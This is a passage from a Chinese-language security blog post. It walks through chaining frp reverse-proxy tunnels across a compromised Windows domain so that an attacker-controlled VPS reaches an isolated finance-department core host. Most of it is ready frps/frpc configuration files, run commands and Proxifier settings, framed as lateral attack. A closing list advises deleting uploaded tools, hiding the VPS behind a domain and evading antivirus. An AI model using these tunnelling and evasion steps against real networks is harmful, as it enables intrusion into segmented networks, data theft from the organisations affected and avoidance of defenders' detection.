<h5 id="（2）在子域用户与子域控制器之间构造一级隧道"><a href="#（2）在子域用户与子域控制器之间构造一级隧道" class="headerlink" title="（2）在子域用户与子域控制器之间构造一级隧道"></a>（2）在子域用户与子域控制器之间构造一级隧道</h5><p>I 、在<strong>子域用户</strong>上配置frp服务端（windows版本的frps）：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frps.ini</span><br>[common]<br>bind_addr = 10.10.3.100  <span class="hljs-comment">#子域用户（win 7 -web服务器）本地内网IP</span><br>bind_port = 7075         <span class="hljs-comment">#开放与客户端（子域用户）连接的端口</span><br>token = 1234567          <span class="hljs-comment">#验证作用</span><br><br>frps.exe -c frps.ini     <span class="hljs-comment">#运行命令</span><br></code></pre></td></tr></table></figure>

<p>II 、<strong>子域控制器</strong>上配置frp客户端（windows版本的frpc）：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frpc.ini</span><br>[common]<br>server_addr = 10.10.3.100  <span class="hljs-comment">#子域用户（win 7 -web服务器）本地内网IP</span><br>server_port = 7075         <span class="hljs-comment">#连接到子域用户服务器开放的端口，且与子域用户服务器端口一致</span><br>token = 1234567 <br><br>[http_proxy]<br>type = tcp                 <span class="hljs-comment">#协议类型</span><br>remote_port = 1080         <span class="hljs-comment">#通过socks5连接到子域用户服务器端口进行数据传输</span><br>plugin = socks5<br><br>frpc.exe -c frpc.ini<br></code></pre></td></tr></table></figure>

<h5 id="（3）子域用户上客户端（windows版本的frpc）"><a href="#（3）子域用户上客户端（windows版本的frpc）" class="headerlink" title="（3）子域用户上客户端（windows版本的frpc）"></a>（3）子域用户上客户端（windows版本的frpc）</h5><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frpc.ini</span><br>[common]<br>server_addr = 163.20.10.25    <span class="hljs-comment">#VPS服务器IP地址</span><br>server_port = 7000          <span class="hljs-comment">#与VPS服务器的端口一致</span><br>token = 123456<br><br>[socks5]<br>type = tcp<br>local_ip = 10.10.3.100  <span class="hljs-comment">#访问的ip可以是内网任何一个ip</span><br>local_port = 1080	<span class="hljs-comment">#本地端口（根据协议修改）</span><br>remote_port = 7001  <span class="hljs-comment">#VPS远程服务器的ip端口</span><br><br>frpc.exe -c frpc.ini<br></code></pre></td></tr></table></figure>

<h5 id="（4）proxifier配置："><a href="#（4）proxifier配置：" class="headerlink" title="（4）proxifier配置："></a>（4）proxifier配置：</h5><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">163.20.10.25</span>    <span class="hljs-number">7002</span>   socks5    <br></code></pre></td></tr></table></figure>

<h4 id="3、三级内网网络环境"><a href="#3、三级内网网络环境" class="headerlink" title="3、三级内网网络环境"></a>3、三级内网网络环境</h4><p>A：VPS服务器：163.20.10.25<br>B：子域用户（win 7-web服务器）：192.168.250.25 和 10.10.3.100<br>C：子域控制器（win server 2016）：10.10.3.6 和 10.10.20.5<br>D：财务部独立子域（win server 2008 R2 ）：10.10.20.3 和 172.16.5.2<br>E：财务部核心区机器：172.16.5.5</p>
<p>PS：内网E核心区主机不能直接连接VPS，可以连接内网D主机，内网D主机不能直接连接VPS，可以连接内网C主机，内网C主机不能直接连接VPS，可以连接内网B主机，B主机可以直接连接VPS，所以通过B作为跳板，将socks代理建设在内网C主机中后，将打通隧道进行横向攻击核心区机器。</p>
<h5 id="（1）VPS上frp服务器端配置：-1"><a href="#（1）VPS上frp服务器端配置：-1" class="headerlink" title="（1）VPS上frp服务器端配置："></a>（1）VPS上frp服务器端配置：</h5><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frps.ini</span><br>[common]<br>bind_addr = 0.0.0.0<br>bind_port = 7788     <span class="hljs-comment">#服务端监听端口</span><br>token = 123456       <span class="hljs-comment">#验证作用</span><br><br>./frps -c frps.ini   <span class="hljs-comment">#运行命令</span><br></code></pre></td></tr></table></figure>

<h5 id="（2）子域控制器（win-server-2016）与-财务部独立子域（win-server-2008-R2-）建立一级隧道"><a href="#（2）子域控制器（win-server-2016）与-财务部独立子域（win-server-2008-R2-）建立一级隧道" class="headerlink" title="（2）子域控制器（win server 2016）与 财务部独立子域（win server 2008 R2 ）建立一级隧道"></a>（2）子域控制器（win server 2016）与 财务部独立子域（win server 2008 R2 ）建立一级隧道</h5><p>I 、子域控制器（win server 2016 ）配置frp服务端：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frps.ini</span><br>[common]<br>bind_addr = 10.10.20.5   <span class="hljs-comment">#子域控制器（win server 2016 ）的财务部共享内网IP地址</span><br>bind_port = 7799         <span class="hljs-comment">#开放与客户端（财务部核心系统）连接的端口</span><br><br>frps.exe -c frps.ini<br></code></pre></td></tr></table></figure>

<p>II 、财务部独立子域（win server 2008 R2 ）配置frp客户端：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frpc.ini</span><br>[common]<br>server_addr = 10.10.20.5  <span class="hljs-comment">#子域控制器服务器的IP地址</span><br>server_port = 7799        <span class="hljs-comment">#连接到子域服务器开放的端</span><br><br>[http_proxy]<br>type = tcp<br>remote_port = 7766       <span class="hljs-comment">#通过socks5连接到子域控制器端口进行数据传输		</span><br>plugin = socks5<br><br>frpc.exe -c frpc.ini<br></code></pre></td></tr></table></figure>

<h5 id="（3）子域用户（win-7-web服务器）与-子域控制器（win-server-2016）搭建二级隧道"><a href="#（3）子域用户（win-7-web服务器）与-子域控制器（win-server-2016）搭建二级隧道" class="headerlink" title="（3）子域用户（win 7-web服务器）与 子域控制器（win server 2016）搭建二级隧道"></a>（3）子域用户（win 7-web服务器）与 子域控制器（win server 2016）搭建二级隧道</h5><p>I 、子域用户（win 7-web服务器）配置frp服务端：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frps.ini</span><br>[common]<br>bind_addr = 10.10.3.100   <span class="hljs-comment">#子域用户（win 7-web服务器）本地内网IP</span><br>bind_port = 7755          <span class="hljs-comment">#开放与子域控制器连接的端口</span><br><br>frps.exe -c frpc.ini<br></code></pre></td></tr></table></figure>

<p>II 、子域控制器（win server 2016）配置frp客户端：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frpc.ini</span><br>[common]<br>server_addr = 10.10.3.100   <span class="hljs-comment">#子域用户（win 7-web服务器）本地内网IP</span><br>server_port = 7755          <span class="hljs-comment">#与子域普通用户开放端口相同</span><br><br>[http_proxy1]<br>type = tcp<br>local_ip = 10.10.20.5         <span class="hljs-comment">#本地IP 访问的ip可以是内网任何一个ip</span><br>local_port = 7766             <span class="hljs-comment">#本地端口（根据协议修改）</span><br>remote_port = 7766            <span class="hljs-comment">#子域普通用户的7766端口</span><br><br>frpc.exe -c frpc.ini<br></code></pre></td></tr></table></figure>

<h5 id="（4）子域用户（win-7-web服务器）与-VPS服务器构建三级隧道"><a href="#（4）子域用户（win-7-web服务器）与-VPS服务器构建三级隧道" class="headerlink" title="（4）子域用户（win 7-web服务器）与 VPS服务器构建三级隧道"></a>（4）子域用户（win 7-web服务器）与 VPS服务器构建三级隧道</h5><p>子域用户（win 7-web服务器）配置frp客户端：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs makefile"><span class="hljs-comment"># frpc.ini</span><br>[common]<br>server_addr = 163.20.10.25    <span class="hljs-comment">#VPS服务器IP地址</span><br>server_port = 7788               <span class="hljs-comment">#与VPS服务器开放端口一样</span><br>token = 123456  <br><br>[socks5]<br>type = tcp<br>local_ip = 10.10.3.100 <span class="hljs-comment">#</span><br>local_port = 7766                <span class="hljs-comment">#本地端口（根据协议修改）</span><br>remote_port = 7766               <span class="hljs-comment">#VPS服务器端口</span><br><br>frpc.exe -c frpc.ini<br></code></pre></td></tr></table></figure>

<h5 id="（5）proxifier配置："><a href="#（5）proxifier配置：" class="headerlink" title="（5）proxifier配置："></a>（5）proxifier配置：</h5><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">163.20.10.25</span>    <span class="hljs-number">7002</span>   socks5    <br></code></pre></td></tr></table></figure>

<h3 id="4-思考"><a href="#4-思考" class="headerlink" title="4. 思考"></a>4. 思考</h3><ol>
<li>frp的特征太明显，容易被杀，并且我们需要将两个文件（frpc.exe和frpc.ini）上传到目标主机，frpc.ini有VPS的真实ip地址，易被目标的安全运维排查发现；</li>
<li>上传的文件，不使用了之后记得删除了。</li>
<li>frp的客户端frpc.ini上线的VPS地址可以绑定到域名，通过域名上线；</li>
<li>frp的经典是走socks代理，是否有代替socks代理的手法？ 如果走集群呢？是否可以考虑不使用socks代理，而是高科技的产品替代frp这类走socks代理的内网穿透工具。</li>
<li>内网穿透避免不了需要落地，免杀就是首要考虑（defender加白）。</li>
</ol>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/" class="category-chain-item">内网穿透</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%86%85%E7%BD%91/">#内网</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/06/11/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95tools%E5%A4%A7%E5%85%A8/" title="渗透测试 —— Tools大全">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">渗透测试 —— Tools大全</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/06/08/zimbra-1/" title="Zimbra邮件服务器的实战使用Tips">
                        <span class="hidden-mobile">Zimbra邮件服务器的实战使用Tips</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <span> © 2023 </span> <a href="https://b11c.github.io" target="_blank" rel="nofollow noopener"><span>b11c</span></a> <span>Powered by</span> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
<span> & </span> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
